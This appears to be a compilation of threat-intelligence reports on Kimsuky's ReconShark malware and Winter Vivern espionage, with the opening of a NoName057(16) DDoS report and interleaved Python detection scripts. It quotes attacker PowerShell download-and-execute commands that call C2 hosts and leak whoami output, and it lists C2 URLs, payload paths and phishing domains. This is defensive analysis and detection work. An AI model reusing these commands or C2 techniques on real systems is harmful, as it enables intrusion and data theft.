In a recent campaign Kimsuky targeted the staff of Korea Risk Group (KRG), the information and analysis firm specializing in matters directly and indirectly impacting the Democratic People’s Republic of Korea (DPRK). We applaud KRG’s willingness to publicly share our analysis of attacks against them so the wider cybersecurity community can use this intelligence for expanded understanding of the Kimsuky threat actor and their own hunting and detection efforts. Our assessment is that the same campaign has been used to continue targeting other organizations and individuals in at least the United States, Europe, and Asia, including think tanks, research universities, and government entities.

Initial Access Targeting

For the deployment of ReconShark, Kimsuky continues to make use of specially crafted phishing emails. Notably, the spear-phishing emails are made with a level of design quality tuned for specific individuals, increasing the likelihood that the target opens them. This includes proper formatting, grammar, and visual cues, so that they appear legitimate to unsuspecting users. The targeted emails, which contain links to download malicious documents, and the malicious documents themselves abuse the names of real individuals whose expertise is relevant to the lure subject, such as political scientists.

In the malicious emails, Kimsuky entices the target to open a link to download a password-protected document. Most recently, they made use of Microsoft OneDrive to host the malicious document for download. For example, as used against KRG, the lure email contained the OneDrive shared file link:

1drv[.]ms/u/s!AvPucizxIXoqedcUKN647svN3QM?e=K6N1gT

The file downloaded is a password-protected .doc file named “Research Proposal-Haowen Song.doc” (SHA1: 86a025e282495584eabece67e4e2a43dca28e505) which contains a malicious macro (SHA1: c8f54cb73c240a1904030eb36bb2baa7db6aeb01).

Malicious Document, themed to DPRK / China

ReconShark: A New BabyShark Reconnaissance Variant

The lure documents Kimsuky distributes contain Microsoft Office macros that activate on document close. Based on overlaps in file naming conventions, the malware staging techniques used, and code format, we assess that the macros implement a newer variant of a reconnaissance capability of Kimsuky’s BabyShark malware seen targeting entities in the Korean peninsula towards the end of 2022. We refer to this BabyShark component as ReconShark.

The ability of ReconShark to exfiltrate valuable information, such as deployed detection mechanisms and hardware information, indicates that ReconShark is part of a Kimsuky-orchestrated reconnaissance operation that enables subsequent precision attacks, possibly involving malware specifically tailored to evade defenses and exploit platform weaknesses.

Information Exfiltration

The main responsibility of ReconShark is to exfiltrate information about the infected platform, such as running processes, information about the battery connected to the system, and deployed endpoint threat detection mechanisms.

Similar to previous BabyShark variants, ReconShark relies on Windows Management Instrumentation (WMI) to query process and battery information.

ReconShark queries process and battery information

ReconShark checks for the presence of a broad set of processes associated with detection mechanisms, such as ntrtscan.exe (Trend Micro OfficeScan), mbam.exe (Malwarebytes Anti-Malware), NortonSecurity.exe (Norton Security), and avpui.exe (Kaspersky Internet Security).

Enumeration of deployed detection mechanisms

In contrast to previous BabyShark variants, ReconShark exfiltrates information without first storing it on the filesystem – the malware stores the information it collects in string variables and then uploads them to the C2 server by issuing HTTP POST requests.

ReconShark exfiltrates information

Payload Deployment

In addition to exfiltrating information, ReconShark deploys further payloads in a multi-stage manner that are implemented as scripts (VBS, HTA, and Windows Batch), macro-enabled Microsoft Office templates, or Windows DLL files. ReconShark decides what payloads to deploy depending on what detection mechanism processes run on infected machines.

Some ReconShark strings are encrypted using a relatively simple cipher to evade static detection mechanisms. These strings are typically commands or scripts for downloading and/or executing payloads.

A decrypted command

ReconShark deploys and executes payloads in different ways. For example, the malware can directly download a payload from the C2 server using the curl utility, but also use Windows Shortcut (LNK files) or Office templates for that purpose.

ReconShark edits Windows Shortcuts (LNK files) to the msedge.exe (Microsoft Edge), chrome.exe (Google Chrome), outlook.exe (Office Outlook), whale.exe (Whale browser), and firefox.exe (Mozilla Firefox) applications. When executed, these LNK files start the linked legitimate applications and execute malicious code at the same time.

Further, ReconShark replaces the default %AppData%\Microsoft\Templates\Normal.dotm Office template, which opens whenever a user starts Microsoft Word, with a malicious Office template hosted at the C2 server. This effectively compromises the execution of Microsoft Word.


ReconShark edits LNK files (top) and deploys a malicious Normal.dotm Office template (bottom)
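The Normal.dotm replacement described above is straightforward to check for on an endpoint. The Python below is an added example rather than code from this report: it inspects a Word template the way a triage script would. A stock Normal.dotm already uses the macro-enabled .dotm content type for its main document part, so that alone says nothing; the discriminating signals are the word/vbaProject.bin part, its content-type declaration, and the vbaProject relationship in document.xml.rels, all of which are absent from a template that has never had macros added. The build_template helper constructs minimal stand-in templates for testing; they are not real Word documents. Inspecting the edited LNK files is out of scope for this example.

```python
import io
import os
import zipfile

VBA_PART = "word/vbaProject.bin"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
VBA_REL_TYPE = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
RELS_PART = "word/_rels/document.xml.rels"


def inspect_template(data):
    """Return the three places a VBA project shows up inside an OOXML template."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        content_types = z.read("[Content_Types].xml").decode("utf-8", "replace")
        rels = z.read(RELS_PART).decode("utf-8", "replace") if RELS_PART in names else ""
    return {
        "has_vba_part": VBA_PART in names,
        "vba_content_type_declared": VBA_CONTENT_TYPE in content_types,
        "vba_relationship": VBA_REL_TYPE in rels,
    }


def is_macro_template(data):
    """True if any indicator is present; a Normal.dotm that never had macros has none."""
    return any(inspect_template(data).values())


def check_user_normal_dotm():
    """Inspect the current user's Normal.dotm; returns None when it does not exist."""
    appdata = os.environ.get("APPDATA")
    if not appdata:
        return None
    path = os.path.join(appdata, "Microsoft", "Templates", "Normal.dotm")
    if not os.path.isfile(path):
        return None
    with open(path, "rb") as f:
        return inspect_template(f.read())


def build_template(with_macro):
    """Constructed minimal template for testing only; not a real Word file."""
    content_types = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
        '<Default Extension="xml" ContentType="application/xml"/>',
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>',
        # The .dotm main-part content type is the same with or without macros.
        '<Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.template.macroEnabledTemplate.main+xml"/>',
    ]
    rels = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">',
    ]
    if with_macro:
        content_types.append('<Default Extension="bin" ContentType="%s"/>' % VBA_CONTENT_TYPE)
        rels.append('<Relationship Id="rId9" Type="%s" Target="vbaProject.bin"/>' % VBA_REL_TYPE)
    content_types.append("</Types>")
    rels.append("</Relationships>")

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "\n".join(content_types))
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(RELS_PART, "\n".join(rels))
        if with_macro:
            # Placeholder bytes standing in for a real (compound-file) VBA project.
            z.writestr(VBA_PART, b"\xd0\xcf\x11\xe0" + b"\x00" * 28)
    return buf.getvalue()


if __name__ == "__main__":
    print("clean :", inspect_template(build_template(False)))
    print("macro :", inspect_template(build_template(True)))
    print("mine  :", check_user_normal_dotm())
```

A positive result is not proof of compromise on its own, since users can legitimately record macros into Normal.dotm; pair it with the file's modification time and with the presence of the %AppData%\1 marker described below.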

The payload staging ends with Windows Batch or VBS scripts that create the %AppData%\1 file with a content of ss or sss. These files may represent markers of a successful ReconShark execution.

A third-stage ReconShark payload

Infrastructure Analysis

All observed infrastructure in this campaign is hosted on a shared hosting server from NameCheap, which we have notified of this malicious activity with a recommendation for takedowns. Kimsuky operators continually made use of LiteSpeed Web Server (LSWS) for managing the malicious functionality.

Kimsuky LiteSpeed Web Server Portal

Phishing emails have been observed being sent from the yonsei[.]lol domain, while rfa[.]ink and mitmail[.]tech are used for command and control. The domain yonsei[.]lol has been active since December 2022, with malicious activity occurring as recently as this week. rfa[.]ink has been actively used since early February 2023, and mitmail[.]tech since mid January 2023. Kimsuky also made use of newshare[.]online as a C2 server for a short time at the end of 2022.

As shown in the ReconShark macro example, beacons are made to the /bio/ directory of rfa[.]ink. During our analysis of the activity, the attacker made multiple attempts at renaming that directory, including /bio433ertgd12/ then later /bio234567890rtyui/, and a day later returning back to /bio/.

This may have been an attempt to hinder research efforts, or to pause the intake of new victims for unknown reasons. The IOC table below highlights each of the URL paths Kimsuky manages across each C2 domain and their specific purpose according to the execution flow in the macro. These patterns match across domains, while the directory they are placed in often varies. Some paths on the C2 domains are configured to redirect visitors to the legitimate Microsoft website.
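Because the operators rotate the domain and rename the directory but keep the script names and the na file names stable, a hunting rule should anchor on the stable parts only. The Python below is an added example, not SentinelLabs or Kimsuky code: it keys on the r.php, ca.php and d.php script names and on the na values from the IOC table at the end of this post, ignores the host and directory entirely, reports unlisted na values with low confidence (ca.php?na= on an unrelated site is a plausible false positive), and runs over a few constructed proxy log lines.

```python
import re
from urllib.parse import parse_qs, urlsplit

# File name (the "na" query value) -> payload type, copied from the IOC table in this post.
PAYLOAD_TYPES = {
    "reg.gif": "VBS script",
    "secur32.gif": "DLL file",
    "dot_eset.gif": "Office template",
    "dot_v3.gif": "Office template",
    "dot_esen.gif": "Office template",
    "dot_avg.gif": "Office template",
    "dot_kasp.gif": "Office template",
    "video.gif": "Windows Batch script",
    "videop.gif": "Windows Batch script",
    "start0.gif": "Windows Batch script",
    "start1.gif": "Windows Batch script",
    "start2.gif": "Windows Batch script",
    "start3.gif": "Windows Batch script",
    "start4.gif": "VBS script",
    "vbs.gif": "VBS script",
    "vbs_esen.gif": "VBS script",
    "vbtmp": "VBS script",
    "battmp": "Windows Batch script",
}

# Only the script name is anchored; the directory (/bio/, /gorgon/, /lee/,
# /bio433ertgd12/, ...) and the host are deliberately left free so that renaming
# the directory or rotating the domain does not break the match.
SCRIPT_RE = re.compile(r"^/(?:[^/]+/)*(r|ca|d)\.php$")


def classify_url(url):
    """Return (stage, detail, confidence) for a ReconShark-style URL, or None."""
    parts = urlsplit(url)
    m = SCRIPT_RE.match(parts.path)
    if not m:
        return None
    script = m.group(1)
    na = parse_qs(parts.query).get("na", [None])[0]
    if script == "r":
        # r.php receives the POSTed host data; a query string is not expected there.
        return ("beacon", "C2 check-in endpoint", "high" if na is None else "low")
    if na is None:
        return None
    if na in PAYLOAD_TYPES:
        return ("payload", PAYLOAD_TYPES[na], "high")
    return ("payload", "unlisted name " + na, "low")


# Constructed proxy log lines (timestamp, client, method, URL, status); not real data.
SAMPLE_PROXY_LOG = """\
2023-04-28T09:12:01Z 10.0.0.14 GET https://rfa.ink/bio234567890rtyui/ca.php?na=dot_kasp.gif 200
2023-04-28T09:12:03Z 10.0.0.14 POST https://rfa.ink/bio234567890rtyui/r.php 200
2023-04-28T09:12:09Z 10.0.0.21 GET https://mitmail.tech/gorgon/ca.php?na=start4.gif 200
2023-04-28T09:13:44Z 10.0.0.33 GET https://www.example.com/images/ca.php?na=logo.gif 200
2023-04-28T09:14:00Z 10.0.0.33 GET https://www.example.com/index.php 200
"""


def hunt(log_text):
    """Scan proxy log lines; return one (client, url, stage, detail, confidence) per hit."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue
        _ts, client, _method, url, _status = fields
        result = classify_url(url)
        if result is not None:
            hits.append((client, url) + result)
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_PROXY_LOG):
        print(hit)
```

The renamed /bio234567890rtyui/ directory in the sample log still classifies, which is the point: a rule written against the literal /bio/ path from the first observation would have gone quiet the day the operators renamed it.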

As with most malicious infrastructure linked to North Korean actors, we can quickly find links back to previous reporting or separate campaigns. For example, links can be found to the domains mainchksrh[.]com and com-change[.]info, with indications com-change was used in 2020-2022 credential phishing campaigns at these subdomains:

aaaaawwqwdqkidoemsk.lives.com-change[.]info
accounts.live.com-change[.]info
accounts.lives.com-change[.]info
cashsentinel.com-change[.]info
cashsentinel.hotmail.com-change[.]info
cashsentinel.hotrnail.com-change[.]info
cashsentinel.live.com-change[.]info
cashsentinel.lives.com-change[.]info
cashsentinel.microsoft.com-change[.]info
cashsentinel.naver.com-change[.]info
cashsentinel.navers.com-change[.]info
cashsentinel.navor.com-change[.]info
cashsentinel.outlock.com-change[.]info
cashsentinel.outlook.com-change[.]info
cloud.navor.com-change[.]info
downmail.navor.com-change[.]info
gmail.com-change[.]info
grnail.com-change[.]info
hotmail.com-change[.]info
hotrnail.com-change[.]info
live.com-change[.]info
lives.com-change[.]info
loges.lives.com-change[.]info
loginsaa.gmail.com-change[.]info
loginsaa.grnail.com-change[.]info
logmes.lives.com-change[.]info
logrns.lives.com-change[.]info
logws.lives.com-change[.]info
microsoft.com-change[.]info
microsoft.loginsaa.gmail.com-change[.]info
microsoft.loginsaa.grnail.com-change[.]info
naver.com-change[.]info
naver.loginsaa.gmail.com-change[.]info
navers.com-change[.]info
navor.com-change[.]info
nlds.navor.com-change[.]info
outlock.com-change[.]info
outlook.com-change[.]info
paypal.com-change[.]info
publiccloud.navor.com-change[.]info
skjflkjsjflejlkjieiieieiei.lives.com-change[.]info
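The list above relies on two tricks: look-alike labels (hotrnail, grnail, outlock, navor, navers, lives) and an apex domain whose first label, com-change, imitates a TLD so that accounts.live.com-change[.]info reads as accounts.live.com at a glance. The Python below is an added example, not from this report, that flags both: it normalizes multi-character confusables such as rn for m, then compares each label against a short brand list by exact match and by Levenshtein distance 1. The brand list and the confusable pairs other than rn/m are assumptions for illustration; the sample hosts are a subset of the list above with the defanging removed.

```python
# Brands seen imitated in the com-change subdomains above (assumed short list).
BRANDS = ["gmail", "hotmail", "outlook", "live", "microsoft", "naver", "paypal"]

# Multi-character look-alikes; rn -> m is the one the list above uses,
# the others are common additions (assumption).
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l")]


def normalize(label):
    for look_alike, real in CONFUSABLES:
        label = label.replace(look_alike, real)
    return label


def edit_distance(a, b):
    """Levenshtein distance, plain dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def impersonated_brand(label):
    """Return (brand, reason) when a hostname label imitates a brand, else None."""
    if label in BRANDS:
        return (label, "exact")
    norm = normalize(label)
    if norm in BRANDS:
        return (norm, "confusable")
    if len(label) >= 4:  # short labels would sit at distance 1 from almost anything
        for brand in BRANDS:
            if edit_distance(norm, brand) == 1:
                return (brand, "near-miss")
    return None


def apex_mimics_tld(apex):
    """True when the registrable domain's first label starts with a TLD and a hyphen."""
    first = apex.split(".")[0]
    return any(first.startswith(tld + "-") for tld in ("com", "net", "org", "gov"))


def analyze_host(host, apex):
    """List (label, brand, reason) for every imitating label left of the apex."""
    if not host.endswith("." + apex):
        return []
    findings = []
    for label in host[: -len(apex) - 1].split("."):
        hit = impersonated_brand(label)
        if hit:
            findings.append((label, hit[0], hit[1]))
    return findings


# Subset of the subdomains listed above, defanging removed so the strings parse.
SAMPLE_HOSTS = [
    "accounts.live.com-change.info",
    "cashsentinel.hotrnail.com-change.info",
    "cashsentinel.outlock.com-change.info",
    "cloud.navor.com-change.info",
    "loginsaa.grnail.com-change.info",
    "microsoft.loginsaa.gmail.com-change.info",
    "navers.com-change.info",
    "skjflkjsjflejlkjieiieieiei.lives.com-change.info",
]


def report(hosts, apex):
    return {h: analyze_host(h, apex) for h in hosts}


if __name__ == "__main__":
    print("apex mimics a TLD:", apex_mimics_tld("com-change.info"))
    for host, findings in report(SAMPLE_HOSTS, "com-change.info").items():
        print(host, "->", findings or "no brand label")
```

The distance-1 check is intentionally conservative; raising it to 2 catches more typos but also starts matching unrelated short words, so in practice a brand list specific to the organization being protected works better than a longer generic one.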

Conclusion

The ongoing attacks from Kimsuky and their use of the new reconnaissance tool, ReconShark, highlight the evolving nature of the North Korean threat landscape. Organizations and individuals need to be aware of the TTPs used by North Korea state-sponsored APTs and take necessary precautions to protect themselves against such attacks. The link between recent activity and a wider set of previously unknown activity attributed to North Korea underscores the need for continued vigilance and collaboration.

Indicators of Compromise

Indicator Description
yonsei[.]lol Phishing Email Sender Domain
https[:]//rfa[.]ink/bio/r.php https[:]//mitmail[.]tech/gorgon/r.php C2 server endpoint.
https[:]//rfa[.]ink/bio/t1.hta https[:]//mitmail[.]tech/gorgon/t1.hta ReconShark payload: HTA script.
https[:]//rfa[.]ink/bio/ca.php?na=reg.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=reg.gif ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/ca.php?na=secur32.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=secur32.gif https[:]//newshare[.]online/lee/ca.php?na=secur32.gif ReconShark payload: DLL file.
https[:]//rfa[.]ink/bio/ca.php?na=dot_eset.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_eset.gif ReconShark payload: Office template.
https[:]//rfa[.]ink/bio/ca.php?na=video.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=video.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=start2.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start2.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=start4.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start4.gif ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/ca.php?na=start3.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start3.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=videop.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=videop.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=start1.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start1.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=vbs_esen.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=vbs_esen.gif ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/ca.php?na=start0.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start0.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/d.php?na=vbtmp ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/ca.php?na=vbs.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=vbs.gif ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/d.php?na=battmp ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=dot_v3.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_v3.gif ReconShark payload: Office template.
https[:]//rfa[.]ink/bio/ca.php?na=dot_esen.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_esen.gif ReconShark payload: Office template.
http[:]//rfa[.]ink/bio/ca.php?na=dot_avg.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_avg.gif ReconShark payload: Office template.
https[:]//rfa[.]ink/bio/ca.php?na=dot_kasp.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_kasp.gif ReconShark payload: Office template.
86a025e282495584eabece67e4e2a43dca28e505 Lure Doc Example – SHA1
c8f54cb73c240a1904030eb36bb2baa7db6aeb01 Macro – SHA1

Winter Vivern | Uncovering a Wave of Global Espionage

By: Tom Hegel
16 March 2023 at 09:55

Executive Summary

  • SentinelLabs has conducted an investigation into Winter Vivern Advanced Persistent Threat (APT) activity, leveraging observations made by The Polish CBZC and Ukraine CERT. Our research has uncovered a previously unknown set of espionage campaigns and targeting activities conducted by this threat actor.
  • Our analysis indicates that Winter Vivern’s activities are closely aligned with global objectives that support the interests of Belarus and Russia’s governments. The APT has targeted a variety of government organizations, and in a rare instance, a private telecommunication organization.
  • The threat actor employs various tactics, such as phishing websites, credential phishing, and deployment of malicious documents, that are tailored to the targeted organization’s specific needs. This results in the deployment of custom loaders and malicious documents, which enable unauthorized access to sensitive systems and information.

Background on Winter Vivern

The Winter Vivern Advanced Persistent Threat (APT) is a noteworthy yet relatively underreported group that operates with pro-Russian objectives. DomainTools initially publicized the group in early 2021, naming it based on an initial command-and-control beacon URL string “wintervivern,” which is no longer in use. Subsequently, Lab52 shared additional analysis several months later, identifying new activity associated with Winter Vivern.

The group has avoided public disclosure since then, until recent attacks targeting Ukraine. A part of a Winter Vivern campaign was reported in recent weeks by the Polish CBZC, and then the Ukraine CERT as UAC-0114. In this activity, CERT-UA and the CBZC collaborated on the release of private technical details which assisted in our research to identify a wider set of activity on the threat actor, in addition to new victims and previously unknown specific technical details. Overall, we find that the Winter Vivern APT is a resource-limited but highly creative group that shows restraint in the scope of their attacks. Our analysis indicates that Winter Vivern activity aligns closely with global objectives that support the interests of Belarus and Russia’s governments.

Targeted Organizations

Our analysis of Winter Vivern’s past activity indicates that the APT has targeted various government organizations since 2021, including those in Lithuania, India, the Vatican, and Slovakia.

Recently linked campaigns reveal that Winter Vivern has targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government. Of particular interest is the APT’s targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war.

The threat actor’s targeting of a range of government and private entities highlights the need for increased vigilance as their operations include a global set of targets directly and indirectly involved in the war.

Luring Methodology

Winter Vivern’s tactics have included the use of malicious documents, often crafted from authentic government documents publicly available or tailored to specific themes. More recently, the group has utilized a new lure technique that involves mimicking government domains to distribute malicious downloads.

In early 2023, Winter Vivern targeted specific government websites by creating individual pages on a single malicious domain that closely resembled those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Security Service of Ukraine.

Malicious Page Mimicking cbzc.policja.gov.pl

In mid 2022 the attackers also made an interesting, lesser observed, use of government email credential phishing webpages. One example is ocspdep[.]com, which was used in targeting users of the Indian government’s legitimate email service email.gov.in.

email.gov.in Login Page

Looking back at less recent activity, we can see in December 2022 the group likely targeted individuals associated with the Hochuzhit.com (“I Want to Live”) project, the Ukraine government website offering guidance and instructions to Russian and Belarus Armed Forces seeking to voluntarily surrender in the war. In these attacks the threat actor made use of a macro-enabled Excel spreadsheet to infect the target.

When the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits, and the abuse of legitimate Windows tools.

View Into The Arsenal

Winter Vivern APT falls into a category of scrappy threat actors, being quite resourceful and able to accomplish a lot with potentially limited resources while willing to be flexible and creative in their approach to problem-solving.

Recent campaigns demonstrate the group’s use of lures to initiate the infection process, utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers.

Fake Virus Scan Loaders

In the case of malicious documents, such as the Hochu Zhit themed XLS files, PowerShell is called through a macro. Specifically, the Invoke-Expression cmdlet is executed, beaconing to the malicious destination ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php. The command first sets ServerCertificateValidationCallback to always return true, which disables TLS certificate validation for the process so the download succeeds regardless of the certificate the server presents.

powershell.exe -noexit -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
iex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')"

One malware family of recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the sample. We identified a related sample following similar use, although it is less complete in malicious design. These samples align with the theme of attacks mimicking a virus scanner, presenting users with the fake scan results similar to the script loaders. Known samples are PE32 executables, written in Visual C++, with a compilation timestamp of May 2021. We assess the threat actor shifted from these original executables to the delivery of batch files with PowerShell scripting, with overlap in their use.

f39b260a9209013d9559173f12fbc2bd5332c52a C:\Users\user_1\source\repos\Aperitivchick\Release\SystemProtector.pdb
a19d46251636fb46a013c7b52361b7340126ab27 C:\Users\user_1\source\repos\Aperitivchick 2\Release\SystemProtector.pdb

APERETIF is a trojan that automates the collection of victim details, maintains access, and beacons outbound to the actor-controlled domain marakanas[.]com. As with the previous script, the trojan runs whoami within PowerShell in its initial activity and sends the result in the idU parameter of its outbound beacon to obtain further instructions and/or downloads.

actor-controlled.exe -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; 
$a=whoami; 
iex (New-Object Net.WebClient).DownloadString("""hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php?idU=$a""")"

APERETIF also uses the signatures.php?id=1 URI through HTTPS GET requests. The group made use of compromised WordPress websites to host the malware, such as with hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i and hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o serving as the download location for APERETIF during initial attack stages.
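The two command lines quoted above share traits that a process-creation detection can key on: an Invoke-Expression download cradle, a ServerCertificateValidationCallback set to {$true} that disables certificate validation for the process, and, in the APERETIF case, the output of whoami carried in the beacon URL. The Python below is an added example, not from this report, that scores constructed command lines on those traits and extracts the URLs to block. The first two samples reproduce the Winter Vivern commands above with the defanging removed; the weights and the threshold are assumptions to be tuned against local administrative PowerShell usage.

```python
import re

# Each indicator: (tag, compiled pattern, weight). Weights are an assumption for
# illustration; tune them against your own baseline of admin PowerShell usage.
INDICATORS = [
    ("download_cradle",
     re.compile(r"\b(?:iex|invoke-expression)\b.*?\b(?:downloadstring|downloadfile|downloaddata)\s*\(",
                re.I | re.S), 3),
    ("tls_validation_disabled",
     re.compile(r"servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}", re.I), 3),
    ("host_fingerprint_in_beacon",
     # $x=whoami ... later reused as a query parameter value (?idU=$x)
     re.compile(r"\$(\w+)\s*=\s*whoami\b.*?[?&]\w+=\$\1\b", re.I | re.S), 2),
    ("noexit_or_hidden",
     re.compile(r"(?:^|\s)-(?:noexit|nop(?:rofile)?|w(?:indowstyle)?\s+hidden)\b", re.I), 1),
]
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def analyze_command(cmd):
    """Score one process command line and pull out every URL it references."""
    tags = [tag for tag, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(w for tag, _, w in INDICATORS if tag in tags)
    return {
        "score": score,
        "tags": tags,
        "urls": URL_RE.findall(cmd),
        "verdict": "suspicious" if score >= 3 else "benign",
    }


def triage(commands):
    """Return only suspicious entries, highest score first."""
    results = [(cmd, analyze_command(cmd)) for cmd in commands]
    flagged = [(cmd, r) for cmd, r in results if r["verdict"] == "suspicious"]
    flagged.sort(key=lambda item: item[1]["score"], reverse=True)
    return flagged


# Constructed process-creation command lines; the first two reproduce the
# Winter Vivern cradles quoted above, the last two are ordinary admin usage.
SAMPLE_COMMANDS = [
    "powershell.exe -noexit -c \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; "
    "iex (new-object net.webclient).DownloadString('https://ocs-romastassec.com/goog_comredira3cf7ed34f8.php')\"",
    'actor-controlled.exe -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; '
    '$a=whoami; iex (New-Object Net.WebClient).DownloadString("""https://marakanas.com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php?idU=$a""")"',
    'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"',
    'powershell.exe -c "Invoke-WebRequest -Uri https://updates.example.com/agent.msi -OutFile C:\\Temp\\agent.msi"',
]


if __name__ == "__main__":
    for cmd, result in triage(SAMPLE_COMMANDS):
        print(result["score"], result["tags"], result["urls"])
```

The certificate-validation bypass is worth its own high weight even without a cradle: legitimate automation almost never needs it, and it is exactly what lets a self-signed or expired C2 certificate go unnoticed.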

Moreover, Winter Vivern employs other intrusion techniques, such as exploiting application vulnerabilities to compromise specific targets or staging servers. An attacker-controlled server was found to host a login page for the Acunetix web application vulnerability scanner, which may serve as a supplementary resource for scanning target networks and potentially used to compromise WordPress sites for malware hosting purposes.

Acunetix Vulnerability Scanner Login

Conclusion

The Winter Vivern cyber threat actor, whose operations of espionage have been discussed in this research, has been able to successfully carry out their attacks using simple yet effective attack techniques and tools. Their ability to lure targets into the attacks, and their targeting of governments and high-value private businesses demonstrate the level of sophistication and strategic intent in their operations. The dynamic set of TTPs and their ability to evade the public eye has made them a formidable force in the cyber domain.

Indicators of Compromise

Type Indicator
Domain bugiplaysec[.]com
Domain marakanas[.]com
Email mfa_it_sec@outlook[.]com
Domain ocs-romastassec[.]com
Domain ocspdep[.]com
Domain security-ocsp[.]com
Domain troadsecow[.]com
URL hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i
URL hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php
URL hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o
URL hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php
IP 176.97.66[.]57
IP 179.43.187[.]175
IP 179.43.187[.]207
IP 195.54.170[.]26
IP 80.79.124[.]135
File SHA1 0fe3fe479885dc4d9322b06667054f233f343e20
File SHA1 83f00ee38950436527499769db5c7ecb74a9ea41
File SHA1 a19d46251636fb46a013c7b52361b7340126ab27
File SHA1 a574c5d692b86c6c3ee710af69fccbb908fe1bb8
File SHA1 c7fa6727fe029c3eaa6d9d8bd860291d7e6e3dd0
File SHA1 f39b260a9209013d9559173f12fbc2bd5332c52a

NoName057(16) – The Pro-Russian Hacktivist Group Targeting NATO

By: Tom Hegel
12 January 2023 at 10:55

By Tom Hegel and Aleksandar Milenkoski

Executive Summary

  • Pro-Russia hacktivist group NoName057(16) is conducting a campaign of DDoS attacks on Ukraine and NATO organizations that began in the early days of the war in Ukraine. Targets have included government organizations and critical infrastructure.
  • NoName057(16) was responsible for disrupting services across the financial sector of Denmark this week. Other recent attacks include organizations and businesses across Poland, Lithuania and others.
  • On January 11th, we observed NoName057(16) begin targeting 2023 Czech presidential election candidates’ websites.
  • SentinelLabs has identified how the group operates over public Telegram channels, a volunteer-fueled DDoS payment program, a multi-OS supported toolkit, and GitHub.

What is NoName057(16)

